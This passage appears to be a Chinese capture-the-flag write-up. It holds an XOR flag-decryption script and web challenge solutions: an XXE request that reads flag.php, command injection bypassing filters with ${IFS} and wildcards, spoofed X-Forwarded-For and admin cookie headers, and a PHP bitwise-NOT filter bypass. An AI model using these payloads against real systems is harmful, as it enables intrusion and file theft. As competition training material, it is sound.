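        raw_iv = bytearray(f.read(8))
        flag = ''
        for _ in range(24):
            enc = bytearray(f.read(8))
            for k in range(8):
                flag += chr(raw_iv[k] ^ t_key[k] ^ enc[k])
            raw_iv = enc
    print(flag)
exit()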
Web
XX
- 源码泄露 index.php~,XXE 利用
POST /index.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 119.61.19.212:8083
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 225
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
<creds>
<user>&xxe;</user>
<pass>111</pass>`</creds>
ping
- 利用 ${IFS} 绕过空格,利用 /fla* 通配符绕过对 flag 的过滤
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*
小明拒绝
- 头部加上
X-Forwarded-For: 127.0.0.1
Cookie: admin=1
php
- 利用取反
<?php
/**
 * Created by PhpStorm.
 * User: y0unge
 * Date: 2019-09-09
 * Time: 17:30
 */
// Prints the URL-encoded bitwise complement of the literal; the URL quoted
// in the writeup passes that value back through ~ on the server side.
//echo (~urldecode("%8F"));
echo urlencode(~"GetYourFlag");
生成取反后的 exp 即可
view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();
找漏洞
- 存在注入,可以读出信息
- 密码明文
- 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面
API
- 扫描目录发现
- 直接有flag
- 常规思路应该是在 API 目录爆破 file 参数,读到 hack.php 的源码,再用 hack.php 写文件